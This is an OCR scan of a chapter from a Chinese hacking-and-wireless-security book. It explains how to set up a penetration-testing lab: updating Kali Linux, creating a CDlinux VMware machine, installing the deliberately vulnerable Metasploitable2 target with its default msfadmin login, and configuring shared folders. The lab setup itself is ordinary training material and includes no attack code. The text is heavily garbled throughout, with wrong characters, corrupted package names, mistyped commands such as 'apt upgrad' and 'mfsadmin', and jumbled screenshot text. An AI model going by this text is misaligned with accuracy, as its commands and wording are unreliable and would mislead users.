如 果 您 需要 用 HTTP 代理 来 连接 外 部 网 络 ， 请 在 此 输入 代理 信息 。 否 则 ， 请 和 置 空 。 


代理 信息 应 按照 http://[[ 用 户 名 ][: 密 码 ]@] 主 机 名 [: 端 口 /” 的 标准 格式 给 出 。 
HTTP 代理 信息 (如 黑 没 有 请 留 空 ) : 


LU 


单 击 “ 登 录 ” 按 钮 ， 至 此 便 完 成 了 
按 Enter 键 ， 进 入 将 GRUB 安 装 至 硬盘 Frye Linux 系 统 的 安装 工作 ， 如 下 图 


界面 ， 保 持 默认 设置 ， 如 右上 图 所 示 。 所 示 。 
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3.2.3 ”更 新 Kali Linux 系 统 


初始 安装 的 Kali Linux 系 统 如 果 不 及 
时 更 新 是 无 法 使 用 的 ， 下 面 介绍 更 新 Kali 
seca eile 
双击 呆 面 上 Kali Linux 系 统 的 终端 黑 
a 


打开 Kali Linux 系 统 的 终端 设置 界 
面 ， 在 其 中 输入 命令 apt update， 然 后 按 
Enter 键 ， 即 可 获取 需要 更 新 软件 的 列表 ， 
如 下 图 所 示 。 


root@kali: ~ 


文件 IF) 编辑 (E) 查看 (V) 搜索 (5S) 终 针 [T) 必 助 [H) 

root@kali;-# apt Update 

寅 中 :1 http://mirrors,neusoft.eduy,.cn/kali kali-rolling InReLease 
正在 读 取 软件 包 列 表 .,.,， 完成 

正在 分 析 软 件 包 的 依赖 关系 树 

正在 读 取 状 态 悦 息 ... 完成 

有 62 个 软件 包 可 以 升级 。 靖 执行 “apt List --upgradable 来 查看 它们 。 
rootGkatLi:-# 国 


获取 完 更 新 列表 后 如 果 有 需要 更 新 
的 软件 ， 可 以 运行 apt upgrad 命 令 ， 如 下 图 
所 示 。 


[FOOTERBUI 

正在 读 取 软件 包 列 表 ,.， 完成 

上 正 酝 分析 软件 包 的 依 攻 关 杀机 

en 

正 企 计算 更 新 . 

生 允 四 件 操 是 首 油 实 装 的 并 且 肌 在 二 加 要 了 : 
libavahi-gobjecte libgfortrans 

使 用 'apt autoremove' 来 知 城 它 ( 它 们 ). 

下 列 【新 】 软 件 包 特 被 安装 ; 
1ibhadhm6 python3-pycryptorome 

下 列 软 件 包 的 版 本 烙 保 持 不 变 ; 
WDSCan 

下 列 软 件 包 哲 被 升级 ; 
avahi-daemon dirmnagr qdbm-Llen oettext-base qlrl.2-1Son-1.9 gis 
gnome-user-docs gnupg gnupg- lin gnupg-utils gpg 9p9-agent 
gpgq-wks-client gqpyg-wks-server 人 pgceony gpgsm gpgv Libaprurltl 
libaprutill-dbd-sqlite3 libaprutill-ldap Libarpack2 
libavahi-clicntl3 Libavahi-cormon-dala Libavahi-commor3 
11havahi-core7 lihavahi-glih!1 libavahi-gohjecte libcupsfilters] 
Libgdbm-compaet4 Libgjs6g LUibjson-gLib-1l1,.9- 晶 
libjson-glib-1.8-common Libmn-otibe libnginx-mod-http-auth-pam 
Libnginx-mod-http-dav-ext Libnginx-mod-http-echo 
libnoinx-mod-http-geoip libnoinx-mod-http-image-filter 
Libnginx mod http subs filtcr Libnginx mod http upstrcom foir 
libnginx-mod-http-xslt-T1ilter Libnqglnx-modg-malt 
libnginx-mod-stream libopenal-data libopenall 
libparted-?s-resizee libparted2 libperl5,.25 man-db modemnanager 
nginx-full parted perl perl-base python-attr python-tk 
pythvon3-pluginbase Python3-pbysnmpbD4 pylhon3- tk rsysloy sulmap 

升级 了 61 个 软件 包 ,新 安装 了 ? 个 软件 包 ,要 和 皂 梧 8 个 软件 包 ,有 1 个 软 忻 包 未 被 升级 ， 

需 雪 下 载 8 6/46.8 MB 的 归档 。 

解 床 据 后 会 湛 三 18.8 MB 的 硒 外 罕 间 。 

您 希望 纶 续 执 行 喇 ? [Y/n] 人 ^R 


stepE 运行 命令 后 会 有 一 个 提示 ， 此 时 按键 


ea eg@ 
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盘 Y 键 ， 即 可 开始 更 新 ， 更 新 中 状态 如 下 图 
所 示 。 


../11-9j5 1.52.4-1 amd64.deb 
正在 将 gjs (1.52.4-1) 解 包 到 (1.52.3-2) 上 ... 
正 准 备 解 包 .../12-gnome-user-docs 3.39.1-1 all.deb 


正在 将 gnome- user-docs (3.39.1-1) 解 包 到 (3.39.6-1) 上 ... 


全 注意 ; 由 于 网 络 原因 可 能 需要 多 执行 几 
次 更 新 命令 ， 直 至 更 新 完成 。 另 外 ， 如 果 
个 别 软件 已 经 安装 并 存在 升级 版 本 问题， 
如 下 图 所 示 。 


rootg@kalLi:-# apt upgrade 

正在 读 取 软 件 包 列 委 ... 完成 

正在 分 析 软 件 包 的 依旧 关 系 树 

正在 恋 取 状态 信息 ... 完成 

正在 计算 更 新 ... 完成 

下 列 软件 包 的 版 本 和 将 保持 不 变 ; 
wpscan 


入 如 了 9 个 次 件 包 ， 新 安装 了 个 软件 包 ,要 却 颗 8 个 软件 包 ,有 1 个 软件 包 未 被 逢 有。 

这 时 ， 可 以 先 鼻 载 旧版 本 ， 运 行 “apt- 
get remove < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 
此 时 按键 盘 上 的 Y 键 即 可 郑 载 。 


root@kali:-# apt-get remove wpscan 
正在 读 取 软件 包 列 表 ..。. 完成 
正在 分 析 软 件 包 的 依赖 关系 树 
正在 读 取 状态 信息 ... 完成 
下 列 软 件 包 是 自动 安装 的 并 且 现 在 不 需要 了 : 
ruby-ethon ruby-ffi ruby-ruby-progressbar ruby-terminal-table ruby-typhoeus 
ruby-unicode-display-width ruby-yaijl 
恒 用 'apt autoremove' 来 扼 载 它 ( 它 们 )， 
下 列 软 件 包 和 将 被 【外 载 】: 
kali-lLinux-full wpscan 
升级 了 9 个 软件 包 ， 新 安装 了 9 个 软件 包 ,要 和 扼 城 2 个 软件 包 , 有 8 个 软件 包 未 被 升级 。 
解 庄 绾 后 将 会 267 kB 的 空间 。 
您 希 鱼 继续 执行 吗 ? [Y/n] y 


气 载 完 旧 版 本 后 ， 可 以 运行 “apt-get 
install < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 此 时 
按键 盘 上 的 Y 键 即 可 开始 安装 新 版 本 。 


rootekali:~# apt-get install wpscan 
正在 读 取 软 件 包 列表 ... 完 
正在 分 析 软 件 包 的 依 畏 关 系 树 
正在 读 取 状 态 信 息 ... 完成 
下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 ; 
ruby-terminal-table ruby-unicode-display-width 
使 用 'apt autoremove' 来 卸载 它 ( 它 们 )。 
会 同时 安 蕉 下 列 软 件 ， 
ruby-cms-scanner ruby-opt-parse-validator ruby-progressbar 
下 列 软 件 包 将 被 【 御 载 】: 
ruby-ruby-progressbar 
下 列 【新 】 软 忻 包 将 被 安装 : 
ruby-cms-scanner ruby-opt-parse-validator ruby-progressbar wpscan 
升级 了 9 个 软件 包 ,， 新 安装 了 4 个 软件 包 ， 要 秃 霄 1 个 软件 包 , 有 8 个 软件 包 未 被 升级 ， 
需要 下 红 9 B/112 kB 的 委 攀 ，。 
解压 缩 后 会 消耗 594 kB 的 柄 外 字 间 。 
您 希 里 继续 执行 吗 ? [Y/n] y 


最 后 ， 再 次 运行 apt upgrade 命令， 如 
果 显 示 无 软件 需要 更 新 ， 此 时 系统 更 新 完 
成 ， 如 下 图 所 示 。 


root@kali:-~# apt Upgrade e 

正在 读 取 软件 包 列 表 ... 完成 

正在 分 析 坎 件 包 的 依 需 关系 机 

正在 读 取 状态 信息 ... 完成 

正在 计算 更 新 ... 完成 

下 列 软件 包 是 自动 安装 的 并 且 现在 不 需 
ruby-terminal-table ruby-unicode- er 

使 用 'apt autoremove' 来 卸载 它 (它们 ). 

升级 了 9 个 软 忻 包 ， 新 安装 了 8 个 软件 包 ， 要 卸载 9 个 软件 包 , 有 8 个 软件 包 未 被 升级 。 


安装 CDlinux 系 统 


CDlinux 是 一 种 小 型 的 迷你 GNU/Linux 


3.3 
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搭建 无 线 测试 系统 Kali Linux 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


” 动 操作 系统 ”， 


Erk pm 


发 行 版 软件 ， 其 名 称 取 自 英 文 的 Compact- 
DistroLinux。 CDlinux 的 体形 小 巧 ， 功 能 
很 强大 。 


CDlinux 简 介 


使 用 者 可 以 把 CDlinux 看 作 是 一 个 “ 移 
把 它 装 到 随身 U 盘 中 ， 无 
论 走 到 哪里 ， 只 要 是 能 文 持 U 盘 局 动 的 计 
算 机 ， 就 可 以 插 上 U 盘 来 启动 CDlinux 操 
作 系 统 ， 从 而 把 这 台 计 算 机 变 成 自己 的 移 
动工 作 站 。 

CDlinux 里 集成 了 最 新 的 Linux 内 核 、 
Xorg 图 形 界 面 、Xfce 窗 口 管理 器 以 及 很 多 
其 他 流行 软件 ， 如 Firefox 浏 览 器 、Pidgin 即 
时 通信 程序 、GIMP 图 像 处 理 程序 等 ， 这 就 
使 得 移动 工作 更 加 方便 。 

另外 ， 还 可 以 把 CD1linux 当 作 一 件 
随身 的 系统 修复 /维护 工具 。 这 是 因为 在 
CDlinux 标 准 版 里 集成 了 大 量 的 系统 修复 / 
维护 工具 ， 如 parted、partimage、part- 
clone、testdisk、foremost 等 ， 使 用 这 些 工 
具 完 全 可 以 满足 日 常 系统 维护 /修复 工作 的 

目前 ，CDlinux 对 简体 中 文 提供 全 面 文 
持 ， 这 极 大 地 方便 了 使 用 中 文 的 用 户 。 


3.3.2 配置 CDlinux 


创建 CDlinux 虚 拟 机 需要 以 下 几 个 


单 击 VMware 虚 拟 机 在 主页 中 有 “ 创 
rep 按钮 ， 如 下 图 所 示 。 
WORKSTATION 14 PRO 


十 加 的 


创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


进入 新 建 虚拟 机 向 导 对 话 框 选择 “ 典 
型 (推荐 ) ” 单 选 按钮 ， 如 右上 图 所 示 ， 
单 击 “下 一 步 ” 按 钮 。 
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欢迎 使 用 新 建 虚 拟 机 问 导 


] 4 您 希望 使 用 症 之 类 型 的 配置 3 
WORK ON 


@®@ 开 型 (推荐 )(T) 
通过 几 个 商 单 的 步 如 创建 Workstation 14.x 
虚拟 机 。 


O 〇 自 定义 (高 级 C) 
他 | 建 带 有 5C5I 控制 避 关于 、 虎 以 磁 盟 类 型 
以 及 与 旧版 VMware 产品 兼容 性 等 高 纺 先 砍 
的 虚拟 机 。 


< 上 一 步 (B) 取消 


在 “安装 客户 机 操作 系统 ”对 话 框 
中 ， 选 择 “ 安 装 程序 光盘 映 因 (iso) ” 单 
选 按钮 ， 并 为 其 添加 CDlinux 光 盘 文 件 ， 如 
下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


安装 寄 户 机 操作 系统 
雇 拟 机 如 也 物理 机 ， 需要 操作 系统 ? 浆 将 如 何 专 装 客户 机 操作 系 坑 ? 


安装 来 产 : 
专 革 程序 光盘 (DJ 


无 可 用 驱动 合 


图 安装 程序 光盘 映像 交 件 (is0 儿 M): 


D:\BaduNetdekDownioad\CDinux_0.9.7.1_Classic_SSE_! ~ 


一” 无 去 检 列 此 光 旦 歇 盆 中 的 些 作 素 统 。 
您 需要 指定 要 去 装 的 欣 作 系统。 


〇 右 后 安装 操作 系统 (5)。 
便 建 的 虚拟 机 将 包 言 一 个 空白 硬 县 。 


帮助 < 上 一 步 (8) ， 下 一 步 (N) > 取消 


在 “选择 客户 机 操作 系统 ”对 话 
框 中 选择 Linux 选 项 ， 版 本 中 选择 “其 他 
Linux2.6x 内 核 ”， 如 下 图 所 示 ， 单 击 “ 下 
一 步 ” 按 钮 。 


选择 容 户 机 探 作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


窗户 机 抒 作 系 纺 
D Microsoft WIndows(V) 
XU) 


是 ) LinuxlL 
D Novell NatWarefE) 
olarsf 


D 其 他 (0) 


版 本 (V) 
其 地 Linux 2.6.x 和 内核 ~ 
部 助 < 上 一 步 (B) 取消 


在 “命名 虚拟 机 ”对 话 框 中 单 击 “ 浏 
览 ”按钮 ， 为 虚拟 机 选择 一 个 保存 位 置 ， 
如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


命名 虚拟 机 
您 希望 该 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V): 
| 其 他 Linux 2.6.x 内 核 


位 置 (L): 
| E:\CDlinux 


在 编辑 "> 首选 项 中 可 更 改 默认 位 置 。 


浏览 (R)... 


< 上 一 步 (B) ， | 下 一 步 (N) > 取消 


“指定 磁盘 容量 ”界面 保持 默认 即 


可 ， 如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


新 建 虚拟 机 向 导 


指定 磁盘 容量 
磁盘 大 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 铺 在 主机 的 物理 磁盘 中 。 六 些 文件 最 初 很 小 ， 随 着 您 
向 虚拟 机 中 滞 加 应 用 程序 、 文 件 和 数据 而 逐渐 变 大 。 


最 大 磁盘 大 小 【6GBJ(S) 8.01E 


针对 其 他 Linux 2.6.x 内 核 的 建议 大 小 : 8 GB 


O 〇 将 虚拟 磁盘 存 铺 为 单个 文件 (D) 
图 将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
ee 可 以 更 轻松 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 性 
[5 


帮助 < 上 一 步 (B) 取消 
至 此 便 配 置 好 了 CDlinux 系 统 ， 如 
下 图 所 示 ， 单 击 “ 完 成 ”按钮 完成 虚拟 机 
创建 。 


新 建 虚 拟 机 向 导 


已 准备 好 创建 虚拟 机 
单 击 完成 创建 虚拟 机 。 然后 可 以 安装 其 他 Linux 2.6.x 内 核 。 


将 使 用 下 列 设 置 创建 虚拟 机 : 
名 称 : 其 他 Linux 2.6.x 内 核 
位 置 : E:\CDlinux 
版 本 : Workstation 14.x 
操作 系统 : 其 他 Linux 2.6.x 内 核 
硬盘 : 8 GB, 拆 分 
内 存 : 256 MB 
网 络 适 村 器 : NAT 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 
自 定义 硬件 (C).… 


< 上 一 步 (B) 取消 


第 3 章 ”搭建 无 线 测 试 系统 Kali Linux 


在 配置 好 的 虚拟 机 启动 界面 ， 单 击 
“开启 此 虚拟 机 ”按钮 ， 启 动 虚 拟 机 ， 如 
下 图 所 示 。 


其 他 Linux 2.6.x 内 核 


je 和 语 此 谋 氢 机 
= 设备 
对 内 丰 256 MB 
口 处 理 器 1 
虽 三 本 [SCSI) 8GB 
CD/VDVD (DE) 正在 使 用 文件 D:... 
和 网 治 湘 陡 路 NAT 
UsB 术 制 器 至 厅 
由 关上 目 动 检测 
种 打 各 机 存在 
性 守 才 地 宇 动 队列 
w 栖 壕 
生 此 条 儿 入 对 这 频 牛 + 


” 诬 拟 机 详 泗 信息 
灶 流 - 已 壮 机 
配 天 文件 : ENVCdlinux 其 从 Linux 2.5.x 内 桩 .vmx 
硬件 次 窜 性 : Worlkstation 14x 应 革 机 
主 IP 堆 址 : 网 治 俩 本 不 可 用 


在 虚拟 机 启动 过 程 中 可 以 选择 语言 环 
境 ， 如 下 图 所 示 。 


-ld 1 [e | 


| NODDT LA on [ 
hLpghLighted entry wili pe execut 


18:46 ee 


一 剖面 帮 多 - 中 时 


3.4 ”安装 与 使 用 靶 机 
拿 到 局 域 网 权限 后 需要 后 续 的 渗透 
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a 3.4.1 
a 


”黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


测试 ， 这 里 选取 一 款 比 较 好 的 靶 机 一 一 
Metasploitable2， 该 靶 机 中 包含 了 大 量 的 系 
统 漏洞 ， 用 户 使 用 该 靶 机 不 仅 可 以 做 日 党 
的 无 线 网 络 安全 练习 ， 还 可 以 提高 目 身 的 
安全 技术 。 
认识 又 机 
: Metasploitable 漏 洞 演 练 系统 ， 是 基于 
ubuntu 操作 系统 ， 本 身 设 计 作 为 安全 工具 测 
试 和 演示 常见 漏洞 攻击 ， edit 
作为 MSF 攻 击 用 的 靶 机 ， 它 是 一 个 具有 无 
孝 宁 打 补丁 油 洞 与 开放 了 了 无数 高 危 端口 区 
渗透 演练 系统 ， 可 以 使 我 们 进行 练习 。 

在 网 络 中 攻击 现实 中 的 主机 是 一 种 违 
法 行为 ， 一 旦 被 对 方 发 现 可 能 会 遭受 被 起 
诉 的 风险 。 因 此 使 用 Metasploitable 系 统 来 练 
习 ， 不 但 可 以 更 加 直观 地 感受 漏洞 利用 的 过 
程 ， 还 可 以 学 会 如 何 修补 防御 这 些 漏 洞 。 


日 己 经 推出 3 个 系 
列 ， 这 里 选用 Metasploitable2。 下 载 并 安装 
Metasploitable2 的 操作 步骤 如 下 : 
在 浏览 器 中 输入 http://sourceforge.net/ 
projects/metasploitable/files/Metasploitable2/ 
网 址 ， 在 打开 的 页 面 中 找到 下 载 页 面 ， 如 
下 图 所 示 。 


Download Latest Version 


metasploitable-linux-2.0.0.zip (873.1 MB) 


[step 园 单 击 下 载 页 面 中 的 下 载 按 钮 ， 并 选择 

软件 的 保存 路 径 ， 下 载 完 成 后 会 有 一 个 名 

为 “metasploitable-linux-2.0.0.zip” 的 压缩 
包 文 件 ， 下 图 为 打开 压缩 包 的 状态 。 


é 返回 马 metasploltable-linux-200zipP\MEetasploitables2-Unux 
名 称 + 大 小 修改 时 间 
国 Metasploitable vmxf 269 6B 2012-05-21 00:37:26 
| Matasploitablevmx 2.8 KB 2012-05-21 00:46:08 
[ Metassplcitablcvmsd 67B 2012-05-21 00;46;08 
访 Mctasploitablevmdk 1.8 GB 2012-05-21 00;46;42 
国 Metssploitable.nvram 8.5 KB 2012-05-21 00:45:50 


将 该 压缩 包 文 件 解压 到 磁盘 当中 ， 双 
击 打开 该 目录 ， 查 看 解压 后 的 文件 是 否 缺 
如 右上 图 所 示 。 
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它 称 修改 日 其 关 弄 坟 小 

国 Metasploitable.nvram 2012/5/21 0:45 Mware 庶 拟 机 . 9 KB 
EE3 Metasploitable.vmdk 2012/5/21 0:46 f e 虚拟 磋 1900 864 . 

| 固 Metasploiteble.vmsd 2012/5/21 0:46 VMware 实 晤 元 .. 1 KB 
SU Metasploitable.vmx 2012/5/21 0:46 D e 虚拟 机 ， B 
国 Metasploitablevmxf 2012/5/21 0:37 Mware 组 成 员 1KB 


侈 注意 : 这 里 存放 的 路 径 是 创建 虚拟 机 后 
的 路 径 ， 因 此 选择 一 块 空间 充足 并 且 便 于 
记忆 的 位 置 。 


打开 wmware 庶 拟 机 ， 
主神 面 ， 如 下 图 所 示 。 


进入 虚拟 机 的 


WORKSTATION 14 PRO™ 


十 器 9 


创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


A 


[step 轿 单 击 “打开 虚拟 机 ”按钮 ， 打 开 “ 打 
开 ” 对 话 框 ， 在 其 中 找到 解压 目录 ， 如 下 
图 所 示 。 


回 # 开 x 
€ 个 [| |) < FFO... > Metasplokable2.. Y 由 | 搜索 "Metasploitable2-Linux"” 记 
组 织 ” 新建 文件 夫 FE” 吕 @@ 
图 视频 A ”名称 收 改 日 其 类 型 
后 | 如 片 5] Metasploitable.vmx 2012/5/21 0:46 
县 下 荔 
小 言 志 Sy > 
文件 各 (N): | | 所 有 支持 的 文 件 ~ 


选中 目录 中 的 虚拟 机 文件 ， 单 击 “ 打 
开 ” 按 钮 ， 这 样 便 创建 好 了 虚拟 机 ， 如 下 
图 所 示 。 


四] Metasploitable2-Linux 


|* 开局 此 二 专机 
上 一， 
[这 升级 此 记 拟 机 
m 设备 
全 512 MB 
口 处 型 总 1 
而 有 去 (SCSI & GS 
3 CDIDYD (ID 日 Ej 3 
刚 网 阁 返 吕 右 NAT 
也 | 网 网 渤 瑟 医 2 公 主 机 模式 
USB 芒 3 器 存在 
悦 呈 示 问 振动 检 弄 
~ ee 术 


和 s MetaspPlcrtable2 [LinuxjMetssploltsbl= 


techniques. The defauk login i ssword js 

msfadmin:msfadmin. Never expose 由 is YM to vv 启 所 机 详 泗 信和 训 

an untrusted network [use NAT or Host-only 状态 : 已 关机 

和 You have any i i 了 本 次 文 件 : 了 D: FFOu utput\vieta £2-Linux\Metasploitable. 
means), To contact the developers, please 醒 尾 茶 容 性 : Workstation 6.5-7 

send email to msfdev@metasploit.com 主 IP 地 扯 : 网 党 全 总 不 可 后 


单 击 “开启 此 虚拟 机 ”按钮 ， 会 弹出 
一 个 对 话 框 ， 如 下 图 所 示 。 


Metasploitable2-Linux - VMware Workstation xX 


2 此 虚拟 机 可 能 已 被 移动 或 复制 。 


为 了 配 秆 特定 的 管理 和 了 网 络 功能 ， 
道 是 否 已 移动 或 复制 了 此 虚拟 机 。 


如 果 您 不 知道 ， 请 回答 我 已 复制 该 虚拟 机 (P) 。 


VMware Workstation 霍 要 知 


我 已 移动 该 虚拟 机 (M) ，| 我 已 复制 该 虚拟 机 (P) 取消 


单 击 “ 我 已 移动 该 虚拟 机 ”按钮 ， 
动 Metasploitable2， 
如 下 有 Wi 14、 oO 


这 样 就 完成 了 靶 机 的 安 


"Ontact: msfdculat Inctasploit .com 


dninAnsftadnin 0 of 


etasploitable login: 


全 注意 : 虚拟 机 镜像 创建 的 虚拟 机 默认 账 
号 和 密码 均 为 mfsadmin， 可 以 通过 passwd 
命令 修改 密码 。 


登录 进 虚 拟 机 以 后 建议 更 改 该 初始 密 
码 ， 修 改 密码 使 用 passwd msfadmin 命 令 ， 
输入 完 命 令 后 会 要 求 输入 原始 密码 ， 原 始 
黎 码 输入 正确 后 会 要 求 输入 新 冤 码 ， 输 入 
两 次 一 样 的 密码 后 表示 修改 密码 完成 ， 如 
下 图 所 示 。 


sfadmin@emetasploitable: 3 passwd msfadmii 
-hanging password for msfadmin. 


nter new UNIX password: 


EtUpe new UNIX password.: 
You must choose a longer password 


Enter new UNIX 


全 注意 : Linux 系 统 中 输入 密码 是 不 显示 
的 ， 直 接 输 入 即 可 ， 不 要 以 为 没有 输入 
另外 ， 如 果 输 入 客 码 过 短 系 统 也 会 提示 要 
求 输入 一 个 较 长 的 黎 码 。 


DaSSword : 


3.4.3 ” 靶 机 的 使 用 


靶 机 安装 完成 后 ， 就 可 以 使 用 该 靶 机 
了 ， 使 用 方法 非常 简单 。 局 动 虚 拟 机 后 ， 
靶 机 系统 也 会 局 动 ， 这 样 用 户 就 可 以 使 用 
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各 种 扫描 工具 来 扫描 辑 机 中 的 系统 漏洞 ， 
进入 演示 使 用 漏洞 攻击 系统 的 过 程 。 


实战 演练 1 一 设置 Kail 与 主机 共享 文件 夹 


通过 安装 虚拟 机 工具 设置 Kali 与 主机 实 
现 共 享 文件 ， 有 具体 操作 步骤 如 下 : 
在 VMware 工具 栏 中 ， 和 选择 “虚拟 
机 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 
“设置 ”菜单 命令 ， 如 下 图 所 示 。 
虚拟 机 (M) 选项 卡 (T) ”帮助 (H) | 有 > 口 
人 电源 (p) > 
，) 可 移动 设备 (D) > 
蜀 停 (U) Ctrl+Shift+P 
i 发 兰 Ctrl+Alt+Del(E) 
上 抓 取 输入 内 容 (人 
[可 ” 快 蛤 (N) > 
捷 获 屏幕 (C) Ctrl+AHt+prtScn 
AN _ 管理 (M) > 
取消 VMware Tools 安装 (T) 


号 设 置 (9).- 六 


3.5 


加， 


Ctr|+G 


Ctrl+D 


打开 “虚拟 机 设置 ”对 话 框 ， 选 择 
“选项 ”选项 卡 ， 并 在 “设置 ”列表 中 和 
择 “ 共 享 文 件 夹 ”选项 ， 如 下 图 所 示 。 


丸 宙 所 到 文 忻 夹 共 至 
二 se 证 共享 文件 史 兰 桂 底 的 文件 显示 始 虑 所 机 中 
帝 坑 ne ne 的 程 斥 。 这 5 各党 为 们 的 | 工 机 和 站 据守 未 
只 了 | 信任 训 溢 机 全 用 全 的 所 
快 翅 [ eft 
轿 导 是 启 用 人 E) 
加 在 下 次 关机 或 挂 起 所 一直 启用 (U) 
立 忻 去 [F] 
和 名称 主机 路 色 
贸 自 sh 登录 趟 芝 志 持 
国定 污 E22 
添加 (A).-. 
如 定 职 消 疆 助 


单 击 “添加 ”按钮 ， 弹 出 “添加 共享 
文件 夹 向 导 ” 对 话 框 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


欢迎 使 用 洪 加 共 玉 文件 夹 同 导 


此 向导 将 引导 您 完成 向 虚拟 机 添加 新 共享 广 
件 夹 的 步 晶 。 


< 上 一 步 (B) 


下 一 步 (N) > 取消 


单 击 “下 一 步 ” 按 钮 ， 在 打开 的 “ 命 
令 共 享 文件 夹 ” 对 话 框 中 输入 文件 夹 名 
称 ， 并 选择 一 个 共享 文件 夹 路 径 ， 如 下 图 
所 示 。 


命名 共享 文件 夫 
如 何 命名 此 共享 文件 夹 ? 


主机 路 径 (H) 
| D:\ShareDir 


] 


名 称 (A) 
ShareDir | 


< 上 一 步 (B) | 下 一 步 (N) > 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “指定 
共享 文件 夹 属性 ”对 话 框 ， 指 定 共 享 文件 
夹 属性 ， 也 可 以 保持 默认 设置 ， 最 后 单 击 
“完成 ”按钮 ， 完 成 共享 文件 夹 的 设置 操 
作 ， 如 下 图 所 示 。 


= 


指定 共享 文件 夫 属 性 
指定 此 共享 文件 夹 的 范围 。 


“其 他 属性 
回 启 用 此 共享 (E) 
口 只 读 (R) 


< 上 一 步 (B) 取消 
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在 VMware 菜单 中 选择 “虚拟 机 ” 菜 
单项 ， 在 弹出 的 菜单 列表 中 选择 “重新 安 
装 VMware Tools” 和 选项， 如 下 图 所 示 。 


虚拟 机 (M) ， 选 项 4(D 帮助 (0) | 有 ~ | | 区 
(D) 电源 (P) > 
加 可 移动 设备 (D) > 
车 停 (U) Ctrl+Shift+P 
吕 发 送 Ctr|+Alt+Del(E) 
抓 取 输入 内 容 人 Ctrl+G 
[ 同 ”快照 (N) > 
抚 获 屏幕 (CO) Ctrl+Alt+PrtScn 
丰 管理 (M)) > 
至 前 [ 妆 雪 VIVIWare 1ools(|) 民 
点 | 设置 (S)... Ctrl+D 


此 时 会 在 Kali 虚 拟 机 中 弹出 一 个 安装 
光盘 ， 打 开光 盘 后 ， 里 面 会 有 5 个 文件 ， 如 
下 图 所 示 。 


《 


> 


@ VMware Tools ~ 


{OD Recent 


玄 Starred 


会 Home 4 

VMwareTools- 

10.2.5-8068393 tar. 
gz 


= 
a 
EJ 
至 
mn 
a 
~ 
~ 


画 Desktop 
种 Documents 
四 Downloads 
所 Music 


怕 Pictures ymware-tools- 


Upgrader-64 


vmware-tools- 
Upgrader-32 
四 Videos 


曾 Trash 


复制 压缩 包 文 件 “VMwareTools- 
10.2.5-8068393.tar.gz” 到 Downloads 目 录 
下 ， 如 下 图 所 示 。 


< >» 会 Home | Downloads v | 


E39 


=- -|=l@ee@e 


‘WO Recent 
让 Starred 
会 Home TGZ 
VMwareTools- 
画 Desktop 10.2.5-8068393.tar. 
gz 
DD Documents 


由 Music 


怕 Pictures 
四 Videos 


问 Trash 


@@ VMwareToo- 全 


[step 图 选中 压缩 包 文 件 ， 右 击 ， 在 弹出 的 快 
捷 菜 单 中 选择 “提取 到 此 处 ”菜单 命令 ， 
如 下 图 所 示 。 


国 用 归档 管理 器 打开 回 车 
使 用 其 他 程序 打开 (A) 
剪 切 [T) 
复制 (C) 
移动 到 ... 
复制 到 ... 

移 到 回收 站 (V) 三 | 除 
重 命 名 (M).. F2 
提取 到 此 处 (E) 
提取 到 (X)... 
压缩 (QO)... 
收藏 

属性 (R) 


开始 解压 文件 夹 ， 解 压 完成 后 ， 在 内 
部 发 现 一 个 vmware-install.pl 文 件 ， 如 下 图 
所 示 。 


| 《 > | / VMwareTo..S5-8068393 | Vmware-tools-distrib Q 


Ctrl+|l 


-= -|=|eee 
问 最 近 使 用 
真 收藏 


合 主 目录 
面 泉 面 


DD Documents 


田 Downloads 


几 Music INSTALL 
伯 Pictures 
悍 Videos A 
东 回收 站 

installer lib vgauth 


加 VMware Too.. 全 


十 其 他 位 置 


#1 


vmware-install.pl 


光标 移动 到 文件 夹 空 白 区 域 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “在 终端 打开 ” 
菜单 命令 ， 如 下 图 所 示 。 


新 建文 件 夹 (F) 
粘贴 (P) 
全 选 (A) 
属性 (R) 
在 终端 打开 (E) 


Shift+Ctrl+N 


Ctrl+A 


这 时 在 终端 中 执行 ./ vmware-install.pl 
命令 ， 下 图 为 执行 效果 。 


~/Downloagds/VMwareTools-10,.2,5-68066393/vMmWare-tools-d1istrib# ./vmware-1install.p 
he installer has detected an existing installation of open-vm-tools packages 
on this system and will not attempt to remove and replace these user-space 
applications, It is recommended to use the open-vm-tools packages provided by 
he operating system, If you do not want to use the existing installation of 
open-vm-tools packages and USe VMware Tools, you must uninstall the 
open-vim-tools packages and re-run this installer. 
he packages that need to be removed are: 
open-vim-tools 
Packages must be removed with the --purge option. 


he installer will next check if there are any missing kernel drivers. Type yes 
f you want to do this, otherwise type no [yes] y 
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[step 轿 如 果 安 装 过 程 中 提示 [yes] ， 按 键 
盘 上 的 Y 键 或 Enter 键 直到 安装 完成 ， 安 装 完 
成 后 ， 在 mnt 目 录 中 会 多 出 一 个 共享 文件 夹 
hgfs， 如 下 图 所 示 。 


root@kali:/# cd mnt 
root@kali: /mnt# ls 

hgfs 

root@kali:/mnt# cd hgfs 
root@kali:/mnt/hoafs# ls 


root@kali:/mnt/hgfs# cd ShareDir/ 
rootG@katLi:y/mnt/hgfs/ShareDir# 国 


实战 演练 2 一 一 设置 Kali 虚 拟 机 的 上 网 
方式 


Kali 虚 拟 机 可 以 设置 3 种 网 络 模式 ， 设 
置 上 网 方式 的 操作 步骤 如 下 : 
